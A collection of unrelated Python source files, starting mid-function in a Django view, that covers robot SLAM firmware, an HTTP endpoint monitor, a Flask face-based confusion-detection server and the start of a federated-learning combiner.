chosen_drop=request.POST.get('Drop_choose')
Link_to_vid = os.path.join(get_BasePath(), self.curr_entry.Link)
self.curr_entry.Link_Data = self.curr_entry.Link.replace('01_Videos', '02_Analysis_Results')
self.curr_entry.save()
x = threading.Thread(target=start_drop_ana)
x.start()
if request.method == 'POST' and 'OpenMainPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'OpenPDFPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_PDF)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'OpenDataPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_Data)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
if request.method == 'POST' and 'OpenXLSXPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link_XLSX)
Folder_path = Folder_path.replace(',', '","')
subprocess.Popen(r'explorer /select,' + Folder_path)
else:
if request.method == 'POST' and 'OpenVideoPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'OpenMainPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'ShowMainPath' in request.POST:
Folder_path = os.path.join(get_BasePath(), self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponse('file:///' + OS_BasePath + Folder_path)
if request.method == 'POST' and 'OpenPDFPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'OpenDataPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
if request.method == 'POST' and 'OpenXLSXPath' in request.POST:
Folder_path = os.path.join(self.curr_entry.Link)
Folder_path = Folder_path.replace(',', '","')
#subprocess.call(Folder_path)
return HttpResponseRedirect('/Data/'+Folder_path)
return HttpResponse('<script>history.back();</script>')
class Delete_entry(BSModalDeleteView):
model = ExpBase
def get_model_name(self, group_name, model_name, pk):
if (model_name == 'None') & (group_name == 'Exp_Main'):
curr_entry = ExpBase.objects.get(pk = pk)
curr_exp = ExpPath.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
elif (model_name == 'None') & (group_name == 'Exp_Sub'):
curr_entry = ExpBaseSub.objects.get(pk = pk)
curr_exp = ExpPathSub.objects.get(Name = str(curr_entry.Device))
name = str(curr_exp.Abbrev)
else:
name = model_name
return name
def get_queryset(self, **kwargs):
pk = self.kwargs['pk']
model_name = self.kwargs['model']
group_name = self.kwargs['group']
model_name = self.get_model_name(group_name, model_name, pk)
curr_model = apps.get_model(group_name, model_name)
self.curr_entry = curr_model.objects.get(pk = pk)
queryset = curr_model.objects.all()
return queryset
template_name = 'Modal/delete_entry.html'
success_message = 'Success: Book was deleted.'
success_url = reverse_lazy('Success_return')
|
use_map_autonomous_drive.py
|
'''
Naruda: 2019-1 AJOU Univ. major of Software department Capstone project
Robot main firmware made by "Park Jun-Hyuk" (github nickname 'BrightBurningPark').
Robot can drive by itself, localize position and direction in given map.
it can also build the map from zero.
I Love my school and the Capstone Program SO MUCH. it's true story ^^.
'''
# python basic or pip-installed library import
import sys
import math
import time
import signal
import threading
# adding ./lib dir to use modules
import sys
sys.path.append('./lib')
# modules under lib directory
import rpslam # BreezySLAM(tinySLAM Implementation) with RPLidar A1
import pathengine # shortest path finding engine
import ntdriver # network driver set
# General variables like Path, Var, Name, etc...
PATH_ROBOT = "/home/odroid/capdi/robot" # robot SW top path
PATH_MAP = PATH_ROBOT + "/maps" # map directory
PATH_LIB = PATH_ROBOT + "/lib" # libraries
MAP_NAME_NO_SLAM = 'MAP_NO_SLAM.pgm' # map name generated by no_map_slam
MAP_NAME_YES_SLAM = 'MAP_YES_SLAM.pgm' # map name pre-drawn
MAP_NAME_PATH_PLANNING = 'MAP_PATH_PLANNING.png' # map name used by pathplanning algorithm. this one is the only png file
def auto_drive(dest):
print('current position / ', narslam.x, narslam.y)
dest_x = dest[0]#int(input('x>> '))
dest_y = dest[1]#int(input('y>> '))
while math.hypot(dest_x - narslam.x, dest_y - narslam.y) > 50:
print('DISTANCE: ', math.hypot(dest_x - narslam.x, dest_y - narslam.y), '| while entered', )
dx = dest_x - narslam.x
dy = dest_y - narslam.y
if abs(dx) <= 10:
dx = 0
if abs(dy) <= 10:
dy = 0
rad = math.atan2(dx, dy)
deg = math.degrees(rad)
if deg < 0:
deg = 360 + deg
#add 180 and %360 here
#deg = (deg + 180) % 360
deg = (deg+90)%360
print('degree: ', deg, ' | ', narslam.theta, ' | (', narslam.x, ', ', narslam.y, ')')
if abs(deg - narslam.theta) <= 180:
if narslam.theta - 7.5 > deg:
nxt.send(ntdriver.LEFT)
elif narslam.theta + 7.5 < deg:
nxt.send(ntdriver.RIGHT)
else:
nxt.send(ntdriver.FORWARD)
else:
if narslam.theta - 7.5 > deg:
nxt.send(ntdriver.RIGHT)
elif narslam.theta + 7.5 < deg:
nxt.send(ntdriver.LEFT)
else:
nxt.send(ntdriver.FORWARD)
time.sleep(0.2)
nxt.send(ntdriver.STOP)
print('arrived to destination')
print('(', narslam.x, narslam.y, narslam.theta, ')')
def testcode(x, y):
print(narslam.x, narslam.y, narslam.theta)
print('input destination cordination in milimeter here')
dest_x_milimeter = x
dest_y_milimeter = y
dest_milimeter = (dest_x_milimeter, dest_y_milimeter)
start_milimeter = (narslam.x, narslam.y)
navi = pathengine.navigation(PATH_MAP + '/' + MAP_NAME_PATH_PLANNING)
navi.search(start_milimeter, dest_milimeter)
navi.extract_rally()
print(navi.path_rally)
for point in navi.path_rally:
auto_drive(point)
print('drive done')
#time.sleep(0.5)
print('arrived on final destination')
def handler(signum, frame):
nxt.send('0')
narslam.flag = 1
t_slam.join()
print('ctrl+Z handling called')
sys.exit(0)
if __name__ == "__main__":
signal.signal(signal.SIGTSTP, handler)
print ('firmware started')
narslam = rpslam.narlam()
#TODO: do yes map slam
t_slam = threading.Thread(target=narslam.slam_yes_map, args=(PATH_MAP, MAP_NAME_YES_SLAM))
t_slam.start()
print('SLAM activated')
nxt = ntdriver.lego_nxt()
nxt.connect()
nxt.send('s40')
print('nxt connected')
while(1):
#if not narslam.viz.display(narslam.x/1000, narslam.y/1000, narslam.theta, narslam.mapbytes):
# exit(0)
cmd = input("please give me order\n(\"goto\": run testcode | 0,1,2,3,4: move)\n>> ")
if cmd == 'goto':
x = input('x>> ')
y = input('y>> ')
testcode(x, y)
print('testcode done')
elif cmd == 'run':
while True:
testcode(1800, 2200)
testcode(2300, 1800)
testcode(900, 900)
testcode(1400, 1400)
testcode(900, 1400)
elif cmd == 'exit':
print('exit')
nxt.send('0')
narslam.flag = 1
t_slam.join()
sys.exit(0)
else:
nxt.send(cmd)
print('(', narslam.x, '|', narslam.y, '| Angle: ', narslam.theta, ')')
|
IntervalRunner.py
|
import threading
import time
class IntervalRunner:
def __init__(self, action, interval):
self.interval = interval
self.action = action
self.stop_event = threading.Event()
thread = threading.Thread(target=self._set_interval)
thread.start()
def _set_interval(self):
next_time = time.time() + self.interval
while not self.stop_event.wait(next_time - time.time()):
next_time += self.interval
self.action()
def cancel(self):
self.stop_event.set()
|
__init__.py
|
""" HEM - HTTP(s) Endpoint Monitor """
from multiprocessing import Pool
from datetime import timedelta
import abc
import logging
import os
import requests
import click
import yaml
import six
import time
import pike.discovery
from pike.manager import PikeManager
import pkg_resources
import threading
import jwt
__version__ = pkg_resources.get_distribution("hemApp").version
class HemStore:
def __init__(self):
self.data = {}
def set(self, key, value):
self.data[key] = value
def get(self, key):
return self.data.get(key, None)
logging.captureWarnings(True)
logger = logging.getLogger(__name__)
def load_config(path = 'hem.yaml'):
"""
Load configuration
"""
path_list = [path, '/etc/hem.yaml']
env_path = os.getenv('HEM_CONFIG', None)
if env_path:
path_list.insert(0, env_path)
for path in path_list:
if os.path.exists(path):
with open(path, 'rt') as config_file:
return yaml.safe_load(config_file.read())
click.echo("No config found in "+', '.join(path_list))
exit(2)
@six.add_metaclass(abc.ABCMeta)
class Metrics(object):
"""Base class for storing of metrics data
"""
@abc.abstractmethod
def __init__(self):
""" Abstract init method """
@abc.abstractmethod
def stage(self, data):
"""Gather the data for storing
:param data: object containing data points
:returns: True or False
"""
@abc.abstractmethod
def store(self):
""" Saves current buffer """
class Check(object):
""" A check and it's testing """
url = ""
method = "get"
name = ""
headers = {"User-Agent": "Hem {}"+__version__}
expected = None
in_body = None
timeout = 10
metrics = None
storage = None
auth = {}
token = None
certificate = None
def __init__(self, name, test, metrics=None, storage=None):
#path, secure=False, verify=True, metrics=None):
self.logger = logging.getLogger(__name__)
self.name = name
self.verify = test.get('verify', True)
if test.get('secure', False):
self.url = "https://{}" + test.get('path', '')
else:
self.url = "http://{}" + test.get('path', '')
self.method = test.get('method', "get")
if 'timeout' in test:
self.timeout = test['timeout']
if 'expected' in test:
self.expected = test['expected']
if 'in_body' in test:
self.in_body = test['in_body']
if 'certificate' in test:
self.logger.info("Setting certificate to %s", test['certificate'])
self.certificate = test['certificate']
if 'headers' in test:
for header in test['headers']:
self.headers[header] = test['headers'][header]
if 'auth' in test:
self.auth = test['auth']
self.metrics = metrics
self.storage = storage
def get_jwt(self, auth={}):
j = requests.post(
auth['url'],
data=auth.get('body', None),
headers=auth.get('headers', None)
)
self.logger.debug(j.status_code)
self.logger.debug(j.text)
token = j.json().get(auth['field'], None)
self.storage.set(auth.get('key', 'jwt'), token)
self.logger.debug("storing token: {}".format(token))
def is_jwt_valid(self, auth={}):
token = self.storage.get(auth.get('key', 'jwt'))
if token == None:
self.logger.debug("No token - therefore not valid")
return False
else:
decoded = jwt.decode(token, verify=False)
if time.time() < decoded['exp']:
self.logger.debug("token still valid")
return True
else:
self.logger.debug("token has expired")
return False
def test(self, param, results):
"""
The core testing -
takes in the parameter to test the check with and returns status and time
"""
elapsed_time = timedelta(seconds=0)
if self.auth.get('type', None) == "jwt":
self.logger.info("Using JWT, checking token")
# If we're using JWT, then we need a token
if self.is_jwt_valid(self.auth) == False:
self.logger.info("JWT: token invalid")
# If there is no token or it's expired, then get one
self.get_jwt(self.auth)
self.headers = {"Authorization":"Bearer {}".format(self.storage.get(self.auth.get('key', 'jwt')))}
self.logger.info(self.headers)
try:
size = 0
http_call=getattr(requests,self.method)
start = time.time()
result = http_call(
self.url.format(param if type(param) == str else param["host"]),
headers=self.headers,
timeout=self.timeout,
verify=self.verify,
cert=self.certificate,
allow_redirects=False
)
self.logger.debug("Response text: %s", result.text)
elapsed_time = result.elapsed
result.raise_for_status()
size = len(result.text)
status = result.status_code
except requests.exceptions.HTTPError as he:
self.logger.debug(he)
self.report_failure(param, result.text)
elapsed_time = result.elapsed
status = result.status_code
except requests.exceptions.SSLError as ssl_error:
self.logger.debug(ssl_error)
self.report_failure(param, ssl_error.strerror)
status = 526
except requests.exceptions.ConnectTimeout as timeout:
self.logger.debug(timeout)
self.report_failure(param, timeout.strerror)
status = 522
elapsed_time = timedelta(seconds=self.timeout)
except requests.exceptions.ReadTimeout as timeout:
self.logger.debug(timeout)
self.report_failure(param, timeout.strerror)
status = 522
elapsed_time = timedelta(seconds=self.timeout)
except requests.exceptions.ConnectionError as connection:
self.logger.debug(connection)
self.report_failure(param, connection.strerror)
status = 444
roundtrip_time = time.time() - start
success = 0
self.logger.debug(self)
if self.expected:
self.logger.debug("Testing status of {} against {}".format(status, self.expected))
if status == self.expected:
success = 1
elif status == requests.codes.ok:
success = 1
if success == 1 and self.in_body:
self.logger.debug("Entering if in body")
self.logger.debug("Testing body for {} in {}".format(self.in_body, result.text))
if self.in_body in result.text:
success = 1
else:
success = 0
status = 600
if self.metrics:
metric_name = param if type(param) == str else param["metric"]
self.metrics.stage(
"{}.{}.result".format(self.name, metric_name.replace('.', '_')),
status
)
self.metrics.stage(
"{}.{}.success.count".format(self.name, metric_name.replace('.', '_')),
success
)
self.metrics.stage(
"{}.{}.failure.count".format(self.name, metric_name.replace('.', '_')),
0 if success == 1 else 1
)
self.metrics.stage(
"{}.{}.time".format(self.name, metric_name.replace('.', '_')),
elapsed_time.total_seconds()
)
self.metrics.stage(
"{}.{}.roundtrip".format(self.name, metric_name.replace('.', '_')),
roundtrip_time
)
self.metrics.stage(
"{}.{}.size".format(self.name, metric_name.replace('.', '_')),
size
)
results.append((status, elapsed_time))
def test_list(self, param_list):
""" Run test over a list of parameters """
results = []
threads = []
# Start a thread for each parameter
for param in param_list:
if param and '{' in param:
param = param.format(**os.environ)
if param != None:
t = threading.Thread(target=self.test, args=(param, results))
threads.append(t)
t.start()
for i in range(len(threads)):
threads[i].join()
self.logger.debug(results)
return results
def report_failure(self, param, message):
""" Display errors """
try:
click.echo(click.style("{} Failed with {}".format(param, message.split('\n')[0]),fg='red'))
except AttributeError:
click.echo(message)
def discover_hosts(src, metrics=None):
discovery_type = src['type']
try:
host_list = list()
with PikeManager(['.', 'drivers']):
discovery = pike.discovery.py.get_module_by_name('hemApp.drivers.discovery_' + discovery_type)
if None != metrics:
src['metrics'] = metrics
try:
host_list = discovery.hosts(**src)
except Exception as e:
logger.error("{} discovery of failed with exception".format(discovery_type))
logger.exception(e)
host_list = []
return host_list
except ImportError as e:
logger.exception(e)
click.echo("Discovery method {} not found".format(discovery_type))
return []
def initialise_metrics(metricConfig):
with PikeManager(['.', 'drivers']):
metrics_driver = pike.discovery.py.get_module_by_name(
'hemApp.drivers.metrics_' + metricConfig.get('type','console')
)
return metrics_driver.instance(metricConfig)
def run_tests(config, metrics=None, storage=None):
# Disable InsecureRequestWarning as when we get these it is expected
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
start = time.time()
logger.info("Started tests at {}".format(start))
if 'discovery' in config:
DEFAULT_DISCOVERY = config['discovery']
else:
DEFAULT_DISCOVERY = {}
store = {}
for test_name in config['tests']:
test = config['tests'][test_name]
# Host list can be an array in the config or discovery
if 'hosts' in test:
hosts = test['hosts']
elif 'discovery' in test:
# Local discovery section inherits defaults but overrides defaults
discovery = DEFAULT_DISCOVERY.copy()
discovery.update(test['discovery']) # Python 3.5 move to context = {**defaults, **user}
hosts = discover_hosts(discovery, metrics)
else:
hosts = []
logger.info("Testing {0} across {1} hosts".format(test_name, len(hosts)))
logger.debug(test)
CHECK = Check(
test_name,
test,
metrics,
storage
)
# test.get('secure',False),
# test.get('verify',True),
start_test = time.time()
results = CHECK.test_list(hosts)
logger.debug(results)
elapsed_test = time.time() - start_test
metrics.stage('hem.elapsed.{}'.format(test_name), elapsed_test)
end = time.time()
metrics.stage('hem.elapsed.loop', end - start)
metrics.store()
return (end - start)
def run_tests_threaded(config, metrics=None, storage=None):
# Disable InsecureRequestWarning as when we get these it is expected
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
start = time.time()
logger.info("Started tests at {}".format(start))
if 'discovery' in config:
DEFAULT_DISCOVERY = config['discovery']
else:
DEFAULT_DISCOVERY = {}
store = {}
for test_name in config['tests']:
test = config['tests'][test_name]
# Host list can be an array in the config or discovery
if 'hosts' in test:
hosts = test['hosts']
elif 'discovery' in test:
# Local discovery section inherits defaults but overrides defaults
discovery = DEFAULT_DISCOVERY.copy()
discovery.update(test['discovery']) # Python 3.5 move to context = {**defaults, **user}
hosts = discover_hosts(discovery, metrics)
else:
hosts = []
logger.info("Testing {0} across {1} hosts".format(test_name, len(hosts)))
logger.debug(test)
CHECK = Check(
test_name,
test,
metrics,
storage
)
# test.get('secure',False),
# test.get('verify',True),
start_test = time.time()
results = CHECK.test_list(hosts)
logger.debug(results)
elapsed_test = time.time() - start_test
metrics.stage('hem.elapsed.{}'.format(test_name), elapsed_test)
end = time.time()
metrics.stage('hem.elapsed.loop', end - start)
metrics.store()
return (end - start)
|
main.py
|
import json
import base64
import numpy as np
import cv2
import os
import mediapipe as mp
import math
from sklearn.svm import OneClassSVM
from sklearn import svm
from joblib import dump, load
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.linear_model import SGDClassifier
import time
import argparse
import flask
from flask import Flask, redirect, render_template, request
from threading import Thread
import logging
from datetime import date
import re
import shutil
CNTR = 0
TOTAL = 400
# deployed = False
FILEPATH = '/mnt/fileserver'
# FILEPATH = '/mnt/d/mnt/fileserver' # Test using wsl
# FILEPATH = 'fileserver'
POI4AOI = [33, 7, 163, 144, 145, 153, 154, 155, 133, 246, 161, 160, 159,
158, 157, 173, 263, 249, 390, 373, 374, 380, 381, 382, 362,
466, 388, 387, 386, 385, 384, 398, 46, 53, 52, 65, 55, 70, 63, 105,
66, 107, 276, 283, 282, 295, 285, 300, 293, 334, 296, 336]
if not os.path.exists(FILEPATH):
# os.rmdir(FILEPATH)
os.makedirs(FILEPATH)
print('folder {} not find, have created one.'.format(FILEPATH))
modelPool = {}
metricPool = {}
def _normalized_to_pixel_coordinates(normalized_x, normalized_y, image_width, image_height):
"""Converts normalized value pair to pixel coordinates."""
# Checks if the float value is between 0 and 1.
def is_valid_normalized_value(value: float) -> bool:
return (value > 0 or math.isclose(0, value)) and (value < 1 or
math.isclose(1, value))
if not (is_valid_normalized_value(normalized_x) and
is_valid_normalized_value(normalized_y)):
# TODO: Draw coordinates even if it's outside of the image bounds.
return None
x_px = min(math.floor(normalized_x * image_width), image_width - 1)
y_px = min(math.floor(normalized_y * image_height), image_height - 1)
return x_px, y_px
def getCrop(img, landmarks):
h, w, _ = img.shape
pt1, pt2, pt3 = landmarks.landmark[133], landmarks.landmark[362], landmarks.landmark[2]
matrix = warpFrom(
_normalized_to_pixel_coordinates(pt1.x, pt1.y, w, h),
_normalized_to_pixel_coordinates(pt2.x, pt2.y, w, h),
_normalized_to_pixel_coordinates(pt3.x, pt3.y, w, h),
)
dstImg = cv2.warpAffine(img, matrix, (img.shape[1], img.shape[0]))
left, top, bottom, right = -1, -1, -1, -1
init = False
for idx in POI4AOI:
px = landmarks.landmark[idx]
try:
px = _normalized_to_pixel_coordinates(px.x, px.y, w, h)
px = (matrix @ np.array([px[0], px[1], 1])).astype(np.int)
if not init:
left, right = px[0], px[0]
top, bottom = px[1], px[1]
init = True
continue
if left > px[0]:
left = px[0]
if right < px[0]:
right = px[0]
if top > px[1]:
top = px[1]
if bottom < px[1]:
bottom = px[1]
except Exception as e:
print('ERROR:{}'.format(e))
# return cv2.rectangle(dstImg, (left, top), (right, bottom), (255, 0, 0), 2)
return dstImg[top:bottom+1, left:right+1]
def warpFrom(pt1, pt2, pt3):
srcTri = np.array([[pt1[0], pt1[1]],
[pt2[0], pt2[1]],
[pt3[0], pt3[1]]]).astype(np.float32)
dstTri = np.array([[300, 180],
[340, 180],
[320, 240]]).astype(np.float32)
matrix = cv2.getAffineTransform(srcTri, dstTri)
return matrix
class Metric:
def __init__(self):
self.req_count = 0
self.file_count = 0
self.nc_req_first = 0
self.nc_req_last = 0
self.nc_file_first = 0
self.nc_file_last = 0
self.c_req_first = 0
self.c_req_last = 0
self.c_file_first = 0
self.c_file_last = 0
def inc_req(self):
self.req_count += 1
def inc_file(self):
self.file_count += 1
def output(self):
text = 'REQ COUNT : {}, FILE COUNT : {}\n'.format(
self.req_count, self.file_count)
text = text + 'NC PHASE: Req last {}, first {}, diff {}, File last {}, first {}, diff {}\n'.format(
self.nc_req_last, self.nc_req_first, self.nc_req_last - self.nc_req_first / 60,
self.nc_file_last, self.nc_file_first, self.nc_file_last - self.nc_file_first
)
text = text + 'C PHASE: Req last {}, first {}, diff {}, File last {}, first {}, diff {}\n'.format(
self.c_req_last, self.c_req_first, self.c_req_last - self.c_req_first,
self.c_file_last, self.c_file_first, self.c_file_last - self.c_file_first
)
return text
class StatePredictor:
def __init__(self, usrname, logger):
global FILEPATH
self.facemesh = mp.solutions.face_mesh.FaceMesh(
max_num_faces=1,
min_detection_confidence=0.5)
self.inputs = []
self.labels = []
self.clf = None
self.pca = None
self.username = usrname
self.retrain_interval = 200 # TODO: incremental training!
self.dir = os.path.join(FILEPATH, str(self.username), 'face')
self.trained = False
self.model_ver = 0
# Same logger as gunicorn
self.logger = logger
# currently we make sure old images and models are removed before each lecture
if not os.path.exists(self.dir):
os.makedirs(self.dir)
else:
modelfiles = [f for f in os.listdir(self.dir) if '.joblib' in f]
# find pca:
pca_suspects = [f for f in modelfiles if re.search(
"^pca.\d+.joblib", f) is not None]
# find model_pca:
model_suspects = [f for f in modelfiles if re.search(
"^model_pca.\d+.joblib", f) is not None]
if len(pca_suspects) == 1 and len(model_suspects) == 1:
pca_path = pca_suspects[0]
model_path = model_suspects[0]
self.clf = load(os.path.join(self.dir, model_path))
self.pca = load(os.path.join(self.dir, pca_path))
self.model_ver = int(pca_path.split('.')[1])
self.trained = True
def model_reset(self):
shutil.rmtree(self.dir)
os.makedirs(self.dir)
self.trained = False
self.model_ver = 0
self.pca = None
self.clf = None
def incre_train(self, img, label, ver):
old_model_path = 'model_pca.{}.joblib'.format(ver - 1)
old_pca_path = 'pca.{}.joblib'.format(ver - 1)
if not self.trained:
# load latest model
# if the model is up-to-date, ver should be exactly model_ver + 1,
# otherwise, we should load latest model (ver - 1) before incremental training.
# Also remove old models before updating to new ones.
if not os.path.exists(os.path.join(self.dir, old_model_path)) or \
not os.path.exists(os.path.join(self.dir, old_pca_path)):
return
self.trained = True
if ver > self.model_ver + 1 or self.clf is None:
self.clf = load(os.path.join(self.dir, old_model_path))
self.pca = load(os.path.join(self.dir, old_pca_path))
os.remove(os.path.join(self.dir, old_model_path))
os.remove(os.path.join(self.dir, old_pca_path))
# train one step
gt_input = np.reshape(img, (1,-1))
gt_input = self.pca.transform(gt_input)
gt_label = np.array([str(label)])
self.clf = self.clf.partial_fit(gt_input, gt_label)
self.logger.info('model updated: {} -> {}'.format(self.model_ver, ver))
self.model_ver = ver
dump(self.clf, os.path.join(
self.dir, 'model_pca.{}.joblib'.format(self.model_ver)))
dump(self.pca, os.path.join(self.dir, 'pca.{}.joblib'.format(self.model_ver)))
def addData(self, img, label, frameId, incre=False, ver=0):
global TOTAL, metricPool
# if self.trained and not incre:
# self.logger.info('Ignore...')
# Save collected image.
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img.flags.writeable = False
results = self.facemesh.process(img)
img.flags.writeable = True
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
if results.multi_face_landmarks:
face_landmarks = results.multi_face_landmarks[0]
# self.logger.debug(matrix)
cropped = getCrop(img, face_landmarks)
img = cv2.cvtColor(cv2.resize(
cropped, (100, 50)), cv2.COLOR_BGR2GRAY)
if not incre:
cv2.imwrite(os.path.join(
self.dir, '{}_{}.jpg'.format(label, frameId)
), img)
else:
self.incre_train(img, label, ver)
metricPool[self.username].inc_file()
if frameId == TOTAL:
# Receive first frame
if label == 0:
metricPool[self.username].nc_file_first = time.time()
else:
metricPool[self.username].c_file_first = time.time()
if frameId == 1:
# Receive last frame
if label == 0:
metricPool[self.username].nc_file_last = time.time()
else:
metricPool[self.username].c_file_last = time.time()
def train(self):
inputs = []
labels = []
img_list = [f for f in os.listdir(self.dir) if '.jpg' in f]
for f in img_list:
label, _ = f.split('_')
img = cv2.imread(os.path.join(self.dir, f), cv2.IMREAD_GRAYSCALE)
inputs.append(np.reshape(img, (-1)))
labels.append(label)
inputs = np.array(inputs)
labels = np.array(labels)
t0 = time.time()
n_component = 150
self.pca = PCA(n_component, svd_solver='auto',
whiten=True).fit(inputs)
self.logger.info('PCA fit done in {}s'.format(time.time() - t0))
t0 = time.time()
X_train_pca = self.pca.transform(inputs)
self.logger.info('PCA transform done in {}s'.format(
time.time() - t0))
t0 = time.time()
# self.clf = SVC()
self.clf = SGDClassifier()
self.logger.debug(X_train_pca.shape)
self.clf = self.clf.fit(X_train_pca, labels)
self.logger.info('SGDClassifier train done in {}s'.format(time.time() - t0))
dump(self.clf, os.path.join(self.dir, 'model_pca.0.joblib'))
dump(self.pca, os.path.join(self.dir, 'pca.0.joblib'))
self.trained = True
def threaded_train(self):
Thread(target=self.train(), args=(self, )).start()
self.logger.info('Threaded Training Started!!!')
return
def confusionDetection(self, img, ver):
model_path = 'model_pca.{}.joblib'.format(ver)
pca_path = 'pca.{}.joblib'.format(ver)
if not self.trained:
# return 'training'
if not os.path.exists(os.path.join(self.dir, model_path)) or not \
os.path.exists(os.path.join(self.dir, pca_path)):
return 'training'
self.trained = True
if self.clf is None or self.model_ver != ver:
self.clf = load(os.path.join(self.dir, model_path))
self.pca = load(os.path.join(self.dir, pca_path))
self.model_ver = ver
tag = ['Neutral', 'Confused']
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img.flags.writeable = False
results = self.facemesh.process(img)
img.flags.writeable = True
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
if results.multi_face_landmarks:
face_landmarks = results.multi_face_landmarks[0]
# self.logger.debug(matrix)
cropped = getCrop(img, face_landmarks)
img = cv2.cvtColor(cv2.resize(
cropped, (100, 50)), cv2.COLOR_BGR2GRAY)
feature = np.reshape(img, (1, -1))
reduced_feature = self.pca.transform(feature)
pred = self.clf.predict(reduced_feature)
self.logger.debug(pred)
res = tag[int(pred[0])]
return res
return 'N/A'
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():
"""
The home page has a list of prior translations and a form to
ask for a new translation.
"""
return "<h1>GazeLearning Server: There's nothing you can find here!</h1>"
@app.route('/detection', methods=['POST'])
def confusion_detection():
global CNTR, TOTAL, FILEPATH
data = request.data #.decode('utf-8')
data = json.loads(data)
# app.logger.debug(data)
img_bytes = base64.b64decode(data['img'].split(',')[1])
im_arr = np.frombuffer(img_bytes, dtype=np.uint8)
img = cv2.imdecode(im_arr, flags=cv2.IMREAD_COLOR)
stage = data['stage']
username = data['username']
ver = data['ver']
if username not in modelPool:
metricPool[username] = Metric()
modelPool[username] = StatePredictor(username, app.logger)
result = 'success'
try:
if stage == 0:
app.logger.info(username,
'stage', stage,
'{}:No.{}'.format(
'Confusion' if data['label'] else 'Neutral', TOTAL + 1 - data['frameId']),
time.time()
)
metricPool[username].inc_req()
modelPool[username].addData(img, data['label'], data['frameId'])
app.logger.info('after add data')
if data['frameId'] == TOTAL:
# Recieve first frame
if data['label'] == 0:
metricPool[username].nc_req_first = time.time()
else:
modelPool[username].model_reset()
metricPool[username].c_req_first = time.time()
elif data['frameId'] == 1:
# Recieve last frame
if data['label'] == 0:
metricPool[username].nc_req_last = time.time()
# here train the classifier at the last frame of NC collecting stage
modelPool[username].threaded_train()
else:
metricPool[username].c_req_last = time.time()
elif stage == 1:
result = modelPool[username].confusionDetection(img, ver)
else:
modelPool[username].addData(
img, data['label'], data['frameId'], incre=True, ver=ver)
except Exception as e:
result = 'ERROR'
app.logger.error(e)
resp = flask.Response()
resp.set_data(json.dumps({'body': {'result': result}}))
resp.headers['Access-Control-Allow-Origin'] = '*'
resp.headers["Access-Control-Allow-Methods"] = "GET,POST,OPTIONS"
resp.headers["Access-Control-Allow-Headers"] = "x-api-key,Content-Type"
resp.headers['Content-Type'] = 'application/json'
return resp
if __name__ == '__main__':
# This part of code will NOT be executed since we are using gunicorn.
# parser = argparse.ArgumentParser()
# parser.add_argument("-p", "--portid", type=int, default=0,
# help="port id")
# args = parser.parse_args()
# PORT = 8000 + args.portid
PORT = 8000
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
# Flask's development server will automatically serve static files in
# the "static" directory. See:
# http://flask.pocoo.org/docs/1.0/quickstart/#static-files. Once deployed,
# App Engine itself will serve those files as configured in app.yaml.
app.run(host='0.0.0.0', port=PORT, debug=True, threaded=True)
else:
# use same log handlers as in gunicorn logger
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
|
combiner.py
|
import os
import queue
import sys
import threading
import uuid
from datetime import datetime, timedelta
from fedn.common.net.connect import ConnectorCombiner, Status
from fedn.common.net.grpc.server import Server
import fedn.common.net.grpc.fedn_pb2 as fedn
import fedn.common.net.grpc.fedn_pb2_grpc as rpc
from fedn.clients.combiner.modelservice import ModelService
from fedn.common.storage.s3.s3repo import S3ModelRepository
import requests
import json
import io
import time
import base64
from collections import defaultdict
from enum import Enum
class Role(Enum):
WORKER = 1
COMBINER = 2
REDUCER = 3
OTHER = 4
def role_to_proto_role(role):
"""
:param role:
:return:
"""
if role == Role.COMBINER:
return fedn.COMBINER
if role == Role.WORKER:
return fedn.WORKER
if role == Role.REDUCER:
return fedn.REDUCER
if role == Role.OTHER:
return fedn.OTHER
####################################################################################################################
####################################################################################################################
class Combiner(rpc.CombinerServicer, rpc.ReducerServicer, rpc.ConnectorServicer, rpc.ControlServicer):
""" Communication relayer. """
def __init__(self, connect_config):
# Holds client queues
self.clients = {}
self.modelservice = ModelService()
self.id = connect_config['myname']
self.role = Role.COMBINER
self.max_clients = connect_config['max_clients']
self.model_id = None
